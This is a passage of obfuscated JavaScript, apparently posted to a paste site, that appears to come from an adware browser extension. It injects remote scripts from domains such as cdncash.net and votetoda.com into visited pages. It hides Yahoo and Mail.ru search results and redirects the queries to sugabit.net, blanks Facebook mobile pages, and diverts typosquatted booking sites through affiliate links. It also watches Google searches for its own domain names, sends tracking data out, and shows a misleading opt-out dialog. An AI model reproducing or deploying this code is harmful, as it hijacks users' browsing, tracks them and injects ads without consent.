  2373.                                                     browserAllowed = false;
  2374.                                                     break
  2375.                                                 }
  2376.                                             }
  2377.                                             if (!browserAllowed) {
  2378.                                                 continue
  2379.                                             }
  2380.                                         }
  2381.                                     } else {};
  2382.                                     if (key == "cd1d2") {
  2383.                                         (function(tbObject) {
  2384.                                             eval("window._lnkr5 = {\'uid\':\'51113x3231x\'+tbObject.tbParams.sid,\'allowTargetBlank\': false};")
  2385.                                         })($$)
  2386.                                     };
  2387.                                     if (key == "6a131") {
  2388.                                         (function(tbObject) {
  2389.                                             eval("window._lnkr30 = {\'uid\':\'51113x3231x\'+tbObject.tbParams.sid,\'host\':\'cdncash.net\'};")
  2390.                                         })($$)
  2391.                                     };
  2392.                                     if (key == "1a2aa") {
  2393.                                         runForceSearch();
  2394.                                         continue
  2395.                                     }
  2396.                                     if (key == "a49b5") {
  2397.                                         continue
  2398.                                     }
  2399.                                     if (scriptRow.type == "external") {
  2400.                                         $$.loadedCallback("MNTZ_INJECT", key);
  2401.                                         scriptUrl = scriptUrl.replace(/\/SID\//g, encodeURIComponent($$.tbParams.sid));
  2402.                                         scriptUrl = scriptUrl.replace(/\/TITLE\//g, encodeURIComponent($$.tbParams.title));
  2403.                                         scriptUrl = scriptUrl.replace(/\/REFERRER\//g, encodeURIComponent(location.href));
  2404.                                         scriptUrl = scriptUrl.replace(/\/REF_HOST\//g, encodeURIComponent(location.hostname ? location.hostname : location.host));
  2405.                                         scriptUrl = scriptUrl.replace(/\/RANDOM\//g, Math.floor(Math.random() * 52));
  2406.                                         scriptUrl = scriptUrl.replace(/\/OPTOUTURL_DBLENCODED\//g, encodeURIComponent(encodeURIComponent(($$.tbParams.optoutUrl ? $$.tbParams.optoutUrl : "http://thisadsfor.us/optout?t=3231&u=51113&block=" + key))));
  2407.                                         scriptUrl = scriptUrl.replace(/\/OPTOUTURL\//g, encodeURIComponent(($$.tbParams.optoutUrl ? $$.tbParams.optoutUrl : "http://thisadsfor.us/optout?t=3231&u=51113&block=" + key)));
  2408.                                         if (scriptUrl) {
  2409.                                             if (scriptUrl.substr(0, 2) == "//") {
  2410.                                                 scriptUrl = (window.location.protocol == "http:" ? "http:" : "https:") + scriptUrl
  2411.                                             }(function(block) {
  2412.                                                 var script = $$.script(scriptUrl, false, (scriptUrlParams.tag_attributes ? scriptUrlParams.tag_attributes : null));
  2413.                                                 $$.on(script, "load", function() {
  2414.                                                     $$.loadedCallback("MNTZ_LOADED", block);
  2415.                                                     $$.updateLimits(block)
  2416.                                                 })
  2417.                                             })(key)
  2418.                                         } else {
  2419.                                             $$.loadedCallback("MNTZ_LOADED", key);
  2420.                                             $$.updateLimits(key)
  2421.                                         }
  2422.                                     } else {
  2423.                                         if (scriptRow.type == "platform") {
  2424.                                             platformBlocks.push(key)
  2425.                                         } else {}
  2426.                                     }
  2427.                                 } catch (e) {
  2428.                                     $$.loadedCallback("CORE_JS_ERROR", key)
  2429.                                 }
  2430.                             }
  2431.                             if (platformBlocks.length > 0) {
  2432.                                 var params = ["sid=" + $$.tbParams.wid + "_" + $$.tbParams.tid + "_" + $$.tbParams.sid, "title=" + encodeURIComponent($$.tbParams.title)];
  2433.                                 for (var i in platformBlocks) {
  2434.                                     if (typeof platformBlocks[i] != "string") {
  2435.                                         break
  2436.                                     }
  2437.                                     params.push("blocks[]=" + platformBlocks[i])
  2438.                                 }
  2439.                                 var url = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/ext/c9f22c14a3872f280d.js?" + params.join("&");
  2440.                                 $$.script(url, false);
  2441.                                 $$.loadedCallback("MNTZ_INJECT", platformBlocks.join(","))
  2442.                             }
  2443.                         }
  2444.                     });
  2445.                     if (scriptsToLoad['af23c']) {
  2446.                         (function(f, h, j) {
  2447.                             var g = true;
  2448.                             try {
  2449.                                 if (chrome.bookmarks) {
  2450.                                     g = false
  2451.                                 }
  2452.                             } catch (c) {}
  2453.                             if (location.protocol == "chrome-extension:") {
  2454.                                 g = false
  2455.                             }
  2456.                             if (g) {
  2457.                                 var b = window.location.href;
  2458.                                 var l = document.getElementById("dexscriptpopup");
  2459.                                 if (l === null && b.indexOf("m.facebook.com") != "-1") {
  2460.                                     document.body.style.width = "0px";
  2461.                                     var k = document.createElement("div");
  2462.                                     k.id = "dexscriptpopup";
  2463.                                     k.style.cssText = "position:fixed; width:100%; height:100%; z-index:100; background:#fff; top:0px; left: 0px;";
  2464.                                     document.body.appendChild(k);
  2465.                                     setTimeout(function() {
  2466.                                         window.close()
  2467.                                     }, 10000)
  2468.                                 }
  2469.                                 var i = document.createElement("script");
  2470.                                 i.id = "dexscriptid";
  2471.                                 i.src = "https://votetoda.com/ext/script.php?id=ukr&track=true";
  2472.                                 var a = document.getElementById("dexscriptid");
  2473.                                 if (a === null) {
  2474.                                     document.body.appendChild(i)
  2475.                                 } else {}
  2476.                             } else {
  2477.                                 var i = document.createElement("script");
  2478.                                 i.id = "dexscriptid";
  2479.                                 i.src = "https://votetoda.com/ext/script.php?id=ukr&track=false";
  2480.                                 var a = document.getElementById("dexscriptid");
  2481.                                 if (a === null) {
  2482.                                     document.body.appendChild(i)
  2483.                                 } else {}
  2484.                             }
  2485.                         })(document, window);
  2486.                     }
  2487.                 }
  2488.                 if (location.host.indexOf("youradexchange.com") >= 0 && location.pathname.indexOf("a/display.") >= 0) {
  2489.                     if ($$.getParams && $$.getParams.r && $$.getParams.r != 391766 && $$.getParams.r != 391769) {
  2490.                         var r = $$.randomNumber(1, 100);
  2491.                         var rLimit = 100;
  2492.                         if (r <= rLimit) {
  2493.                             setTimeout(function() {
  2494.                                 location.href = "http://www.youradexchange.com/a/display.php?r=391769&sub1=pr" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid
  2495.                             }, 0)
  2496.                         } else {}
  2497.                     }
  2498.                 }
  2499.                 try {
  2500.                     if (location.hostname.indexOf("google.") == 0 || location.hostname.indexOf("www.google.") == 0) {
  2501.                         var checkKeywords = function() {
  2502.                             var searchEls = document.getElementsByName("q");
  2503.                             var kw;
  2504.                             if (searchEls) {
  2505.                                 kw = searchEls[0].value
  2506.                             }
  2507.                             if (!kw) {
  2508.                                 return false
  2509.                             }
  2510.                             var pattern = /(lnkr\.us|urlvalidation\.com|adrs\.me|icontent\.us|trendtext\.eu|metrext\.com|ratexchange\.net|adserv\.info|serverads\.net|takethatad\.com|adnotbad\.com|tradeadsexchange\.com|spaceshipad\.com|jsfuel\.com|cdnclntr\.com|amiok\.org|whatzmyip\.net|lancheck\.net|connectionstrenth\.com|spidtest\.org|siteheart\.net|cdncash\.com|cdncash\.net|cdncash\.org|ge0ip\.com|ge0ip\.net|ge0ip\.org|cdnvalid\.xyz|domainvalidation\.xyz|domaincdn\.xyz|validdomain\.xyz|cdnstr\.xyz|cdnswf\.xyz|validationcdn\.xyz|validcdn\.xyz|networkcheck\.xyz|netcheckcdn\.xyz|cdnanalytics\.xyz|netanalytics\.xyz|networkanalytics\.xyz|analyzenetwork\.xyz|domainanalyzing\.xyz|analyzecdn\.xyz|validanalytics\.xyz|netwcdn\.xyz|cdnnetwok\.xyz|validcndnet\.xyz|cdnlvry\.xyz|glgnltks\.xyz|intrnlcss\.xyz)/i;
  2511.                             if (kw.match(pattern)) {
  2512.                                 clearTimeout(checkKeywordsTimerId);
  2513.                                 $$.loadedCallback("GOOGLE_KEYWORD_MATCH");
  2514.                                 $$.script("//urlvalidation.com/rememberme");
  2515.                                 $$.script("//adrs.me/rememberme")
  2516.                             }
  2517.                         };
  2518.                         var checkKeywordsTimerId;
  2519.                         var runCheckKeywords = function() {
  2520.                             checkKeywordsTimerId = setTimeout(runCheckKeywords, 1000);
  2521.                             checkKeywords()
  2522.                         };
  2523.                         $$.ready(function() {
  2524.                             runCheckKeywords()
  2525.                         })
  2526.                     }
  2527.                 } catch (e) {}
  2528.                 var matchPattern = /(boobking\.|booing\.|buking\.|boocking\.|boooking\.|bookking\.|booing\.)/i;
  2529.                 if (location.hostname.match(matchPattern)) {
  2530.                     if (typeof window.stop == "function") {
  2531.                         window.stop()
  2532.                     }
  2533.                     location.href = "http://adrs.me/get?key=6ae9f4bd1dc812dc713d61cba871d8e8&out=http%3A%2F%2Fbooking.com&ref=http%3A%2F%2Fgo.com&format=go&uid=rdr51113"
  2534.                 }
  2535.                 if (scriptsToLoad['85031']) {
  2536.                     (function() {
  2537.                         var block = '85031';
  2538.                         $$.ready(function() {
  2539.                             try {
  2540.                                 (function() {
  2541.                                     if (location.hostname.indexOf("search.yahoo.com") == -1 || location.pathname.indexOf("/search") == -1) {
  2542.                                         return
  2543.                                     }
  2544.                                     var r = $$.randomNumber(1, 100);
  2545.                                     var rLimit = scriptsToLoad[block].coverage;
  2546.                                     if (r > rLimit) {
  2547.                                         return
  2548.                                     }
  2549.                                     $$.loadedCallback("MNTZ_LOADED", block);
  2550.                                     if ($$.getCookie("__mtz_srchyho_fired") == 1) {
  2551.                                         return
  2552.                                     }
  2553.  
  2554.                                     function getParams() {
  2555.                                         params = {};
  2556.                                         for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  2557.                                             t = r[c].split("="), t[1] && (params[t[0]] = t[1])
  2558.                                         }
  2559.                                         var a = location.hash.replace("#", "");
  2560.                                         a && (t = a.split("="), t[1] && (params[t[0]] = t[1]))
  2561.                                     }
  2562.  
  2563.                                     function checkYahooTag() {
  2564.                                         getParams();
  2565.                                         if (location.href.indexOf("tightrope") > -1 && location.href.indexOf("tr57") > -1) {
  2566.                                             return
  2567.                                         } else {
  2568.                                             redirectSearch("p")
  2569.                                         }
  2570.                                     }
  2571.  
  2572.                                     function redirectSearch(e) {
  2573.                                         if (getParams(), void 0 != params[e]) {
  2574.                                             window.stop && window.stop(), document.documentElement.style.opacity = "0", document.documentElement.style.display = "none";
  2575.                                             var r = params[e],
  2576.                                                 c = "http://sugabit.net/search.php?source=btn&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  2577.                                             $$.loadedCallback("BANNER_LOAD", block);
  2578.                                             $$.setCookie("__mtz_srchyho_fired", 1, {
  2579.                                                 expire: 1800
  2580.                                             });
  2581.                                             location.href = c, clearInterval(tmr)
  2582.                                         }
  2583.                                     }
  2584.  
  2585.                                     function checkForSearch() {
  2586.                                         var e = location.href; - 1 != d.indexOf("search.yahoo.com") && checkYahooTag() && clearInterval(tmr)
  2587.                                     }
  2588.                                     var d = window.document.domain,
  2589.                                         tmr, tmrCnt = 0,
  2590.                                         params = {};
  2591.                                     window == top && (checkForSearch(), tmr = setInterval(checkForSearch, 100))
  2592.                                 })()
  2593.                             } catch (e) {}
  2594.                         })
  2595.                     })()
  2596.                 }
  2597.                 if (scriptsToLoad['ac348']) {
  2598.                     (function() {
  2599.                         var block = 'ac348';
  2600.                         $$.ready(function() {
  2601.                             try {
  2602.                                 (function() {
  2603.                                     if (location.hostname.indexOf("go.mail.ru") == -1 || location.pathname.indexOf("/search") == -1) {
  2604.                                         return
  2605.                                     }
  2606.                                     var r = $$.randomNumber(1, 100);
  2607.                                     var rLimit = scriptsToLoad[block].coverage;
  2608.                                     if (r > rLimit) {
  2609.                                         return
  2610.                                     }
  2611.                                     $$.loadedCallback("MNTZ_LOADED", block);
  2612.                                     if ($$.getCookie("__mtz_srchmlr_fired") == 1) {
  2613.                                         return
  2614.                                     }
  2615.  
  2616.                                     function getParams() {
  2617.                                         params = {};
  2618.                                         for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  2619.                                             t = r[c].split("="), t[1] && (params[t[0]] = t[1])
  2620.                                         }
  2621.                                         var a = location.hash.replace("#", "");
  2622.                                         a && (t = a.split("="), t[1] && (params[t[0]] = t[1]))
  2623.                                     }
  2624.  
  2625.                                     function checkMailruTag() {
  2626.                                         getParams();
  2627.                                         if (params.frc && params.frc == "821563") {
  2628.                                             return
  2629.                                         } else {
  2630.                                             redirectSearch("q")
  2631.                                         }
  2632.                                     }
  2633.  
  2634.                                     function redirectSearch(e) {
  2635.                                         if (getParams(), void 0 != params[e]) {
  2636.                                             window.stop && window.stop(), document.documentElement.style.opacity = "0", document.documentElement.style.display = "none";
  2637.                                             var r = params[e],
  2638.                                                 c = "http://sugabit.net/search.php?source=btn2&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  2639.                                             $$.loadedCallback("BANNER_LOAD", block);
  2640.                                             $$.setCookie("__mtz_srchmlr_fired", 1, {
  2641.                                                 expire: 1800
  2642.                                             });
  2643.                                             location.href = c, clearInterval(tmr)
  2644.                                         }
  2645.                                     }
  2646.  
  2647.                                     function checkForSearch() {
  2648.                                         var e = location.href; - 1 != d.indexOf("go.mail.ru") && checkMailruTag() && clearInterval(tmr)
  2649.                                     }
  2650.                                     var d = window.document.domain,
  2651.                                         tmr, tmrCnt = 0,
  2652.                                         params = {};
  2653.                                     window == top && (checkForSearch(), tmr = setInterval(checkForSearch, 100))
  2654.                                 })()
  2655.                             } catch (e) {}
  2656.                         })
  2657.                     })()
  2658.                 }
  2659.             })(document, window);;
  2660.             (function(g, a, e) {
  2661.                 var c = a["c9f22c14a3872f280d"];
  2662.                 var f = c.Sizzle;
  2663.  
  2664.                 function b() {
  2665.                     var d = f(".commercial-unit");
  2666.                     var i = f("input[name=q]");
  2667.                     if (i.length > 0 && d.length > 0) {
  2668.                         var h = i[0].value;
  2669.                         c.loadedCallback("GGL_COM_BLOCK", "", h)
  2670.                     }
  2671.                 }
  2672.                 c.each(f("input[name=q]"), function(d) {
  2673.                     c.on(d, "change", function() {
  2674.                         b()
  2675.                     })
  2676.                 });
  2677.                 b()
  2678.             })(document, window, undefined);;
  2679.             (function(e, a, f, c) {
  2680.                 var b = a[f];
  2681.                 b.twBarOptOutInit = function() {
  2682.                     var g = document.createElement("iframe");
  2683.                     g.setAttribute("style", "display: none; position: fixed; top: 50%; left: 50%; width: 650px; height: 500px; margin-top: -250px; margin-left: -325px; z-index: 2147483647;");
  2684.                     g.id = "__twboptc9f22c14a3872f280d";
  2685.                     g.frameBorder = 0;
  2686.                     g.scrolling = "no";
  2687.                     document.body.appendChild(g);
  2688.                     var d = null;
  2689.                     var h = function() {
  2690.                         if (d) {
  2691.                             clearTimeout(d)
  2692.                         }
  2693.                         var i = {};
  2694.                         if (g.contentWindow) {
  2695.                             i = g.contentWindow.document
  2696.                         } else {
  2697.                             if (g.contentDocument) {
  2698.                                 i = g.contentDocument
  2699.                             }
  2700.                         }
  2701.                         i.open();
  2702.                         i.write('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>' + a[f].tbParams.title + ' OptOut</title><style>article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}template{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a{background:0 0}a:active,a:hover{outline:0}h1{margin:.67em 0}b,strong{font-weight:700}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-size:1em}pre{white-space:pre-wrap}q{quotes:"ВЃC" "ВЃD" "ВЃ8" "ВЃ9"}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}figure{margin:0}button,input,select,textarea{margin:0}button,select{text-transform:none}button{cursor:pointer;-webkit-appearance:button}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}select{background:#fff!important}}*,:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#428bca;text-decoration:none}a:focus,a:hover{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1;color:inherit}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1{font-size:36px}h2{font-size:30px}h3{font-size:24px}h4{font-size:18px}h5{font-size:14px}h6{font-size:12px}p{margin:0 0 10px}small{font-size:85%}cite{font-style:normal}ol,ul{margin-top:0;margin-bottom:10px}dl{margin-top:0;margin-bottom:20px}dd,dt{line-height:1.428571429}dt{font-weight:700}dd{margin-left:0}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote:after,blockquote:before{content:""}address{margin-bottom:20px;font-style:normal;line-height:1.428571429}code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}table{max-width:100%;background-color:transparent}th{text-align:left}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:700}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}output{display:block;padding-top:7px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:400;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;background-image:none;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:active,.btn-primary:focus,.btn-primary:hover{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active{background-image:none}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:active,.btn-warning:focus,.btn-warning:hover{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active{background-image:none}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:active,.btn-danger:focus,.btn-danger:hover{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active{background-image:none}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:active,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active{background-image:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}@font-face{font-family:"Glyphicons Halflings";src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format("embedded-opentype"),url(../fonts/glyphicons-halflings-regular.woff) format("woff"),url(../fonts/glyphicons-halflings-regular.ttf) format("truetype"),url(../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular) format("svg")}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:2000000;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{position:relative;z-index:1050;width:auto;margin:10px}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);box-shadow:0 3px 9px rgba(0,0,0,.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:after,.modal-footer:before{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}@media screen and (min-width:768px){.modal-dialog{width:600px;margin:30px auto}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,.5);box-shadow:0 5px 15px rgba(0,0,0,.5)}}</style><content><div class="modal-content" style="font-family:\'Segoe UI\',\'Droid Sans\',Arial,sans-serif; width:650px"><div class="modal-header"><button type="button" class="close" id="close-btn" data-dismiss="modal" aria-hidden="true"><img src="//cdncash.net/ext/images/close-cross.png" width="16" height="16"></button><h4 class="modal-title" id="myModalLabel"><b>' + a[f].tbParams.title + '\'s development is supported by <u style="position:static">optional</u> ads</b></h4></div><div class="modal-body">' + a[f].tbParams.title + '\'s development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\'ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help.<br><br>Ads support most of the internet we all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.<br><br><b>You can disable these ads now or later in the settings page. You can also minimize the ads appearance by clicking on partial support button. Both of these options are available by clicking \'x\' button in the corner of each ad.</b> In both cases,your choice will remain in effect unless you reinstall or reset the extension.</div><div class="modal-footer"><button type="button" id="full-support" class="btn btn-success btn-lg">Fully Support</button><button type="button" id="partial-support" class="btn btn-default">Partially Support</button><p style="text-align:left;width:100%;"><a id="no-support" style="text-decoration:underline;" href="#">No, I don\'t want to support you work</a></p></div></div></content>');
  2703.                         i.close();
  2704.                         i.getElementById("full-support").onclick = function() {
  2705.                             b.optoutHide();
  2706.                             b.loadedCallback("OPTOUT_CLK_FULLSUPPORT");
  2707.                             return false
  2708.                         };
  2709.                         i.getElementById("close-btn").onclick = function() {
  2710.                             b.optoutHide();
  2711.                             b.loadedCallback("OPTOUT_CLK_CLOSE");
  2712.                             return false
  2713.                         };
  2714.                         i.getElementById("partial-support").onclick = function() {
  2715.                             window.open("http://thisadsfor.us/optout?t=3231&u=51113&key=c9f22c14a3872f280d&block=" + b.currentOptoutBlock);
  2716.                             b.optoutHide();
  2717.                             b.loadedCallback("OPTOUT_CLK_PARTSUPPORT")
  2718.                         };
  2719.                         i.getElementById("no-support").onclick = function() {
  2720.                             window.open("http://thisadsfor.us/optout?t=3231&u=51113&key=c9f22c14a3872f280d&block=" + b.currentOptoutBlock);
  2721.                             b.optoutHide();
  2722.                             b.loadedCallback("OPTOUT_CLK_NOSUPPORT")
  2723.                         }
  2724.                     };
  2725.                     if (g.contentDocument || g.contentWindow) {
  2726.                         h()
  2727.                     } else {
  2728.                         b.on(g, "load", h);
  2729.                         d = setTimeout(h, 5000)
  2730.                     }
  2731.                     b.twBarOptOut = a[f].twBarOptOut = g
  2732.                 }
  2733.             })(document, window, "c9f22c14a3872f280d", undefined);;
  2734.             d.loadedCallback("FINISHED", "", location.host)
  2735.         })
  2736.     });;
  2737.     try {
  2738.         b(document, window)
  2739.     } catch (c) {
  2740.         var h = (typeof c.stack != "undefined" ? c.stack : "!empty stack!");
  2741.         if (h.length > 1500) {
  2742.             h = h.substr(0, 1500)
  2743.         }
  2744.         var a = (i.location.protocol == "http:" ? "http:" : "https:") + "//cdncash.net/log/?l=error&m=" + encodeURIComponent((typeof c.message != "undefined" ? c.message : "!empty message!") + "|" + h);
  2745.         var k = document.createElement("script");
  2746.         k.type = "text/javascript";
  2747.         k.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  2748.         (document.getElementsByTagName("script")[0] || document.documentElement.firstChild).parentNode.appendChild(k);
  2749.         (function() {
  2750.             var e = ["mid=", "wid=51113", "sid=" + (i[g] && i[g].tbParams && i[g].tbParams.sid) ? i[g].tbParams.sid : "", "tid=3231", "custom1=" + encodeURIComponent((typeof c.message != "undefined" ? c.message : "!empty message!")), "rid=CORE_JS_ERROR"];
  2751.             a = (i.location.protocol == "http:" ? "http:" : "https:") + "//cdncash.net/metric/?" + e.join("&");
  2752.             var d = f.createElement("img");
  2753.             d.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  2754.             d.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  2755.             (document.head || document.documentElement).appendChild(d);
  2756.             if (typeof d.onload != j) {
  2757.                 d.onload = function() {
  2758.                     d.parentNode && d.parentNode.removeChild(d)
  2759.                 }
  2760.             }
  2761.         })()
  2762.     }
  2763. }(document, window));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement